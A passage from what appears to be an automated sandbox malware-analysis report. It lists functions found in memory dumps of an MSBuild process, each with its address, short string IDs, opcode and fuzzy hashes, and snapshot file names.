                          • Instruction Fuzzy Hash: 4F518A35B002158FDB69AF68C454A3E7BB6BF99301B50486DD906CB3A4DF31EC0ACB90
                          Function 05AAF111 Relevance: 2.7, Strings: 2, Instructions: 174COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: (nq$,nq
                          • API String ID: 0-719044535
                          • Opcode ID: 5e411d87759912eb2b188ddfcb401ad1a0b7614d39cc1c32a8906a0a633eedb7
                          • Instruction ID: 8778e3cef5280a7568810eed3f6ca6b45de51068f446627c0e9ca28465744687
                          • Opcode Fuzzy Hash: 5e411d87759912eb2b188ddfcb401ad1a0b7614d39cc1c32a8906a0a633eedb7
                          • Instruction Fuzzy Hash: 1A5104337041996FCB028EA59C509FF7FBAEF89111F080067FA15D7251DA29CD159BB0
                          Function 05AA8FB2 Relevance: 2.6, Strings: 2, Instructions: 145COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq$pnq
                          • API String ID: 0-968720291
                          • Opcode ID: d1bb7b790e06ab3dafdda42638a3ed5ceb82bd801ee419a359977d6386182e64
                          • Instruction ID: d957016cd750f7b46e1bfe702ce5bbd3e71a5521c298128048c050ec82baf463
                          • Opcode Fuzzy Hash: d1bb7b790e06ab3dafdda42638a3ed5ceb82bd801ee419a359977d6386182e64
                          • Instruction Fuzzy Hash: 30411471A402059FCB45DB68D940BBFBBBBFFC8300F548528C409976A9EB75AD06C7A1
                          Function 05AC8C61 Relevance: 2.6, Strings: 2, Instructions: 141COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: (nq$(nq
                          • API String ID: 0-2974481825
                          • Opcode ID: 1486f94b9737ed87ca3c92e86c0ef145ca7aea3e82b2c6ae59e9de02d78d7073
                          • Instruction ID: af5634a7b20c2bfd323723a8851e21f181d2bc6f62e34d27a1bba60214cd7e00
                          • Opcode Fuzzy Hash: 1486f94b9737ed87ca3c92e86c0ef145ca7aea3e82b2c6ae59e9de02d78d7073
                          • Instruction Fuzzy Hash: E7410331E0421A4FCB15DBB998146EFBFF6EF8A220F14816AD405E7395EE349C068B90
                          Function 059028E8 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351996598.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq$4'jq
                          • API String ID: 0-1204115232
                          • Opcode ID: adf6c1bf6e6784a46da9983f6fcb24ce6ee5bafff9d582ce8f2eaa5fbf8f432a
                          • Instruction ID: adf7c2e8b42c67c1448198aad8c2610416d49872d9825f66f3212a2f966d7509
                          • Opcode Fuzzy Hash: adf6c1bf6e6784a46da9983f6fcb24ce6ee5bafff9d582ce8f2eaa5fbf8f432a
                          • Instruction Fuzzy Hash: FC315C28F146358B0FBAA339926CA3E189BBFC4550394295DCC67DB3D8DE28CC4253C6
                          Function 059056F8 Relevance: 2.6, Strings: 2, Instructions: 115COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351996598.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq$4'jq
                          • API String ID: 0-1204115232
                          • Opcode ID: ca46c7bbd97b692d15040d2f14d3154c1d2a79cb82afcdd808c1872f8db785e9
                          • Instruction ID: affbcb070b1db63d7dd8f24b067b13e687c4b6413a03c5344b864f1dac448345
                          • Opcode Fuzzy Hash: ca46c7bbd97b692d15040d2f14d3154c1d2a79cb82afcdd808c1872f8db785e9
                          • Instruction Fuzzy Hash: B031B434B00318CF9B3966684554A3E29AFAFC4550B5A6D69CD43CB7D5DE34CC029BE1
                          Function 02AE0D38 Relevance: 2.6, Strings: 2, Instructions: 106COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: (nq$Hnq
                          • API String ID: 0-3116299003
                          • Opcode ID: d4dd76dff314e6e73ffc43f3e0bfae613b479fba5394372f5b43e043797ab9c2
                          • Instruction ID: 099ddcd3902cbc907a8ed935c78839db5cc1f9f685d3b2058876b4ae4b5f87c4
                          • Opcode Fuzzy Hash: d4dd76dff314e6e73ffc43f3e0bfae613b479fba5394372f5b43e043797ab9c2
                          • Instruction Fuzzy Hash: 8B31AE30A007118FC7A4DF6ED8806AFBBE6FF88200B144569D54AD7351DE70AD0A8B91
                          Function 05AAB6A2 Relevance: 2.6, Strings: 2, Instructions: 92COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: (nq$Hnq
                          • API String ID: 0-3116299003
                          • Opcode ID: e5bf0ead09502bf51608fd2a408e90a3eddddcbefe33d03e99d5d1fb2d51ad34
                          • Instruction ID: a6715a3a5829929c0c37f123e934dec0680916e363b00a92107944953bb5a281
                          • Opcode Fuzzy Hash: e5bf0ead09502bf51608fd2a408e90a3eddddcbefe33d03e99d5d1fb2d51ad34
                          • Instruction Fuzzy Hash: 0F313B717052448FD7059BA9D9507AF3BAAEF96301F1541A6C805CB3B1DF34CD0A8751
                          Function 05AC48D0 Relevance: 2.6, Strings: 2, Instructions: 75COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: xnq$c4
                          • API String ID: 0-1975259164
                          • Opcode ID: b65282eda07771d93d8890356486affe22fdc7f269aa6ea9efaf30f18131e257
                          • Instruction ID: a3b7e3f3523ff9afa6f31e22cee1eaef07b8fb25bc91e897ba85a5469b15f797
                          • Opcode Fuzzy Hash: b65282eda07771d93d8890356486affe22fdc7f269aa6ea9efaf30f18131e257
                          • Instruction Fuzzy Hash: A9214D34A041149FDF18DFA9E450FAEBFF6FB4C311F10816AE516AB284D730A855CB95
                          Function 02AE00A0 Relevance: 2.6, Strings: 2, Instructions: 72COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: -$XXjq
                          • API String ID: 0-3937903693
                          • Opcode ID: 2c28865bd1f2568b1fdbb700e18500f082b40cc598126938d9dfd878d818f9d2
                          • Instruction ID: ec9b0858c383832d2dcfce0c79463aae4623e33c5b1beee090499a1d3d0940f2
                          • Opcode Fuzzy Hash: 2c28865bd1f2568b1fdbb700e18500f082b40cc598126938d9dfd878d818f9d2
                          • Instruction Fuzzy Hash: A9315E31900209CBCF04DFA8D9806DDB7B5FF54310F14867ADD557B259EBB16A8ACBA0
                          Function 05AAA8B8 Relevance: 1.9, Strings: 1, Instructions: 677COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: ,nq
                          • API String ID: 0-1069744364
                          • Opcode ID: 39687da3b730682d4af13fa6fadf98fdc0f5fa803353e5cafcf061a13a3823f9
                          • Instruction ID: 1f33c92483cead6b206172f415cbab3e4f78cd5ffc3b7119d0889c6a43c9e09a
                          • Opcode Fuzzy Hash: 39687da3b730682d4af13fa6fadf98fdc0f5fa803353e5cafcf061a13a3823f9
                          • Instruction Fuzzy Hash: 74520875A002288FDB68CF69C985BEDBBF6BF88300F1541D9E509A7361DA309D85CF61
                          Function 05AA4260 Relevance: 1.8, Strings: 1, Instructions: 534COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: (_jq
                          • API String ID: 0-2603807687
                          • Opcode ID: 1af8b0319bce27c610331403ec6a8fd7f0a467bd6eb02ee428eeee440aefa7e3
                          • Instruction ID: 30e31c09effcc88e1d62a41fd9e663b6f0bd9dea581fdcec28df92a6a852d254
                          • Opcode Fuzzy Hash: 1af8b0319bce27c610331403ec6a8fd7f0a467bd6eb02ee428eeee440aefa7e3
                          • Instruction Fuzzy Hash: 18226D36A102159FDB18DFA8D494A6DBBF2FF88300F158169E905EB3A5DBB1EC41CB50
                          Function 05AA6980 Relevance: 1.6, Strings: 1, Instructions: 392COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: $jq
                          • API String ID: 0-2886413773
                          • Opcode ID: 2815a54ac142fefa8d8aa37c68080aa2a9f11455d4270b8d518764ba423500fa
                          • Instruction ID: 215975c976bed189f72841c9dc75735bd195621edad9f69b48cbcd579d6d8449
                          • Opcode Fuzzy Hash: 2815a54ac142fefa8d8aa37c68080aa2a9f11455d4270b8d518764ba423500fa
                          • Instruction Fuzzy Hash: 16E19B72B042528FEB29DF69C458B3A7AF2FF85200F184129EA56CB391DB35DC45CB61
                          Function 012ACA80 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualProtect.KERNEL32(?,?,?,?), ref: 012ACAF4
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331692491.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_12a0000_MSBuild.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          • Opcode ID: cd2df4fad608ccb99b17c726870c7525fa828470c99da6fcf1510520a2a23d33
                          • Instruction ID: dca9cf3f600dc470e95416f5012d4c42d9cd809827b9d094990d72e5795c7641
                          • Opcode Fuzzy Hash: cd2df4fad608ccb99b17c726870c7525fa828470c99da6fcf1510520a2a23d33
                          • Instruction Fuzzy Hash: 4211F4B1D002499FDB10DFAAC884AAFFBF5FF48320F10842AD519A7250C779A944CFA0
                          Function 012ACC50 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                          Download Yara Rule
                          APIs
                          • FindCloseChangeNotification.KERNEL32 ref: 012ACCB2
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331692491.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_12a0000_MSBuild.jbxd
                          Similarity
                          • API ID: ChangeCloseFindNotification
                          • String ID:
                          • API String ID: 2591292051-0
                          • Opcode ID: 258af970b7ff6f6401f893151feb5ffcf69d40d8c1ee5c3f4e1705e6d160e650
                          • Instruction ID: 618daef7ad4984bfa2104d0b6bb045d34a28c091e9878167074f1e21c64f5521
                          • Opcode Fuzzy Hash: 258af970b7ff6f6401f893151feb5ffcf69d40d8c1ee5c3f4e1705e6d160e650
                          • Instruction Fuzzy Hash: 261128B1D002498BDB20DFAAC4457AFFBF5EF88320F208419D519A7250CB79A944CBA0
                          Function 05AAA8A8 Relevance: 1.5, Strings: 1, Instructions: 286COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: ,nq
                          • API String ID: 0-1069744364
                          • Opcode ID: 9511d6bc27a3929cf9b434cb55fca5d6259e7e487982d9a19eeff5877971da9a
                          • Instruction ID: bbf77ddd3f41d056451d5e1a82517e1e4f70d60a3dbb19c18024a2cbb06b0238
                          • Opcode Fuzzy Hash: 9511d6bc27a3929cf9b434cb55fca5d6259e7e487982d9a19eeff5877971da9a
                          • Instruction Fuzzy Hash: C0C15175A002288FDB18DB68C945FEDBBF6BF88700F158199E509AB3A1DB349D45CF60
                          Function 05AAE3A8 Relevance: 1.5, Strings: 1, Instructions: 273COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: (nq
                          • API String ID: 0-2756854522
                          • Opcode ID: 0ee7a7ba386013b59d4455b8ceaad717495e28937b3f994fbfe7c092588a8a44
                          • Instruction ID: 6e7ffdfc480db21ee209a11dca54c1c2b1a296f396ddc5cd8bd3d218a5ca4237
                          • Opcode Fuzzy Hash: 0ee7a7ba386013b59d4455b8ceaad717495e28937b3f994fbfe7c092588a8a44
                          • Instruction Fuzzy Hash: 32A19F367042009FD7199F68D954E2A7BB7FF89300F1581A9E6068B3B2DB36EC42DB51
                          Function 058F6130 Relevance: 1.5, Strings: 1, Instructions: 260COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: Dqq
                          • API String ID: 0-373195589
                          • Opcode ID: 453406e26bcb2ce1afeeec0b647081316f0d8863ec919b22262b12909a9d03e3
                          • Instruction ID: 3440dc2fb7e997774ecdbf1c7e36a9b5966f98ff009968c206df18cc95c4e334
                          • Opcode Fuzzy Hash: 453406e26bcb2ce1afeeec0b647081316f0d8863ec919b22262b12909a9d03e3
                          • Instruction Fuzzy Hash: B4A17F316002159FC718EF6AD594A6EBBF6FF89310F158169E506DB3A9EB31EC01CB90
                          Function 05AC5978 Relevance: 1.5, Strings: 1, Instructions: 246COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: (nq
                          • API String ID: 0-2756854522
                          • Opcode ID: 267616f29b8fbd1510a52c0336448adadb0a5e23686e6a8a1bb6bd214f55c6c4
                          • Instruction ID: bb692e3f540a71935f09707cb28feb5eea4b872baa73beaccbb05cd33b6b6f03
                          • Opcode Fuzzy Hash: 267616f29b8fbd1510a52c0336448adadb0a5e23686e6a8a1bb6bd214f55c6c4
                          • Instruction Fuzzy Hash: EFA1A075E042168FCB04CB59C4D4CBEBFB2FF49211B5486A9E9569B361DB30EC42CB90
                          Function 05ACEC08 Relevance: 1.5, Strings: 1, Instructions: 226COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: Dqq
                          • API String ID: 0-373195589
                          • Opcode ID: c90c8d1667afb0b82c7b7adeb3bb4a5361cfa5413346d4ba9d83a6ea8b7734b6
                          • Instruction ID: 6a81536093fc5a99bedf3b0fa9b47d5bea036c3ee7896eb24b6d3dc65b7cb6f4
                          • Opcode Fuzzy Hash: c90c8d1667afb0b82c7b7adeb3bb4a5361cfa5413346d4ba9d83a6ea8b7734b6
                          • Instruction Fuzzy Hash: 9A918B34A006119FCB15EF69D584E6EBBF6FF89310F1181A8E406AB3A5DB30EC41CB90
                          Function 05AA99C8 Relevance: 1.5, Strings: 1, Instructions: 222COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq
                          • API String ID: 0-3676250632
                          • Opcode ID: 63ff18cea0cd5773925c5f743269c35053769188f3023e1e5e1c7244aed603d7
                          • Instruction ID: 5e236144905ea7fac530d2e883f4f8f122b62b47add4d7bbdbcf4b96a463f0e3
                          • Opcode Fuzzy Hash: 63ff18cea0cd5773925c5f743269c35053769188f3023e1e5e1c7244aed603d7
                          • Instruction Fuzzy Hash: 70A1CA35B10218DFDB04DFA4D998E9EBBB6FF89300F558159E406AB365DB70AC42CB90
                          Function 05D9FE50 Relevance: 1.4, Strings: 1, Instructions: 173COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2354143987.0000000005D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5d90000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: (nq
                          • API String ID: 0-2756854522
                          • Opcode ID: f23cb011caa449f28f86df08a8a6de597e9efcc6d04fcf714b6d781667432ef3
                          • Instruction ID: f3dfc2f49df3f72c9f09cf4d3d3511d19156cdc59206944bf79d55335ba1ddf5
                          • Opcode Fuzzy Hash: f23cb011caa449f28f86df08a8a6de597e9efcc6d04fcf714b6d781667432ef3
                          • Instruction Fuzzy Hash: 0141C136B006168FCB15DF58C48496AFBB5FF8A320B158666EA19DB341D730F856CBD0
                          Function 05ACEBF8 Relevance: 1.4, Strings: 1, Instructions: 165COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: Dqq
                          • API String ID: 0-373195589
                          • Opcode ID: cda19f61b7acb3cf53b51bed9258c7733da2918748ef3dccc7219c2287951443
                          • Instruction ID: 7f29b71c2e5d9d66005178e12e3bf069ee275157df781975e00f9462c107bce1
                          • Opcode Fuzzy Hash: cda19f61b7acb3cf53b51bed9258c7733da2918748ef3dccc7219c2287951443
                          • Instruction Fuzzy Hash: BB619B346006119FC715EF69D584E69BBF6BF89310B1582A8E416EB3B5DB30FC41CB90
                          Function 058F6121 Relevance: 1.4, Strings: 1, Instructions: 164COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: Dqq
                          • API String ID: 0-373195589
                          • Opcode ID: ef25adb162a892d957963c2a48a0b076305c4efd67919c938286136e3153224d
                          • Instruction ID: 022ced370c5b1c29337ae9a934c86f883503c6fb01b4f07cbf1f66ce6cd5d097
                          • Opcode Fuzzy Hash: ef25adb162a892d957963c2a48a0b076305c4efd67919c938286136e3153224d
                          • Instruction Fuzzy Hash: 57616F75600615DFC718EF2AD584A5DBBF2FF89310B158268E906EB369EB31EC41CB90
                          Function 058FF5D0 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: pnq
                          • API String ID: 0-1150273632
                          • Opcode ID: 3af35848b0a618cc09fe97238fa649c21a82124dcfdb1a05c646fd04c28639b9
                          • Instruction ID: 4134ff10eec73a1a4e93353c920497f59a883ca589acbf700fd37d3452bd8c1e
                          • Opcode Fuzzy Hash: 3af35848b0a618cc09fe97238fa649c21a82124dcfdb1a05c646fd04c28639b9
                          • Instruction Fuzzy Hash: D5515C76640100AFCB499FA8C944D6A7FB7FF8D31471A8494E209CB376DA36DC22DB50
                          Function 058FA909 Relevance: 1.4, Strings: 1, Instructions: 140COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: Tejq
                          • API String ID: 0-2468842661
                          • Opcode ID: ff9837418f5b93744c5286d05faff8bbe78bbf4e4d848ad865192c8510bbd573
                          • Instruction ID: 486e3e3a405b18a80cc6aa75bf64105a73251f35dda87b20be120aad771e4daa
                          • Opcode Fuzzy Hash: ff9837418f5b93744c5286d05faff8bbe78bbf4e4d848ad865192c8510bbd573
                          • Instruction Fuzzy Hash: 7851E134B04204CFEB08DB59E449BAD73A7BB8C320F1A8076DA0AC739ADB745D85CB51
                          Function 05AAD4DF Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq
                          • API String ID: 0-3676250632
                          • Opcode ID: 4633427b859887e098e6d3df0b7149980b829859dfb7fb6231a194d41da21478
                          • Instruction ID: 0de6cf012d940efd2a77792fa1bf0f6d5f0f864271750aace1b1e14a91be2630
                          • Opcode Fuzzy Hash: 4633427b859887e098e6d3df0b7149980b829859dfb7fb6231a194d41da21478
                          • Instruction Fuzzy Hash: C0416131B106148FCB14EB64C598EBEB7BBAFC9600F50842DE406AB3A4DF749C06CB91
                          Function 05AA0E80 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: ,nq
                          • API String ID: 0-1069744364
                          • Opcode ID: ca99bd5536ac72861af4eb709d2e32fe25fd83ca2a74dcbc6116cda7d6d276d8
                          • Instruction ID: 6d6c6913300a0be3ca04a324ba03e98b3d2d81e03e0e6a46efcc7f8074a7aade
                          • Opcode Fuzzy Hash: ca99bd5536ac72861af4eb709d2e32fe25fd83ca2a74dcbc6116cda7d6d276d8
                          • Instruction Fuzzy Hash: 8741AB367001058FCB14DF69D9549AEBBB6FF89310F15816AE906EB365CB31ED01CB91
                          Function 05AC0EA0 Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq
                          • API String ID: 0-3676250632
                          • Opcode ID: 5e3adff06d45f37b1e33ae53d36ab34eea6946db0eb0d7dda9fe54a5db97ad2b
                          • Instruction ID: c446a299836da8bea07864f97179696fcb65c23db5185d3db745dbe4dbbf8b03
                          • Opcode Fuzzy Hash: 5e3adff06d45f37b1e33ae53d36ab34eea6946db0eb0d7dda9fe54a5db97ad2b
                          • Instruction Fuzzy Hash: A53138713406109FD308AB69C968F2B7BEAAFC8714F204568E50A8B3A5DF75EC42C791
                          Function 05AC0EB0 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq
                          • API String ID: 0-3676250632
                          • Opcode ID: 4a4e2292f7b6ca5031e22b3f77d945e11a10ea11b37780e43e3efee33c561321
                          • Instruction ID: 92c706df6e9e57b8f9f50d29f2aa59c2e97d7d956077e07a8633eb883c1206ac
                          • Opcode Fuzzy Hash: 4a4e2292f7b6ca5031e22b3f77d945e11a10ea11b37780e43e3efee33c561321
                          • Instruction Fuzzy Hash: 91312A753406109FD308EB69C968F2A7BEAAFC8710F104568E60A8B3A5CF75EC42C791
                          Function 05AA9DD9 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq
                          • API String ID: 0-3676250632
                          • Opcode ID: c833bfc78d0ee7832c06909413f3c19d266567204991cd6b9b8b07b4b237bfb4
                          • Instruction ID: dffd63c5aac771274d43f0acdb7ce80f6831b43baa8aedc8aa2ed969d115d1d0
                          • Opcode Fuzzy Hash: c833bfc78d0ee7832c06909413f3c19d266567204991cd6b9b8b07b4b237bfb4
                          • Instruction Fuzzy Hash: 1A41D634B40214CFDB18DB64D999EAEBBB2FF88305F204558E4069B3A6CB71ED42CB50
                          Function 05ACAA0C Relevance: 1.4, Strings: 1, Instructions: 104COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: LRjq
                          • API String ID: 0-665714880
                          • Opcode ID: 31bbea3adc53ebbcd8f31668fd24a83a9eb9f9d43623b8a80e1584227b4e931f
                          • Instruction ID: 4df98a41c5604b2fb0d1f17cf5193c42f7ef85e3a555d83fa94163595de0a4f1
                          • Opcode Fuzzy Hash: 31bbea3adc53ebbcd8f31668fd24a83a9eb9f9d43623b8a80e1584227b4e931f
                          • Instruction Fuzzy Hash: 8B413D32A140399FDF44DB68D9408BE77F3BFC8201B1A8555E802BB795CB35AD05CBA1
                          Function 05AA8E40 Relevance: 1.3, Strings: 1, Instructions: 90COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq
                          • API String ID: 0-3676250632
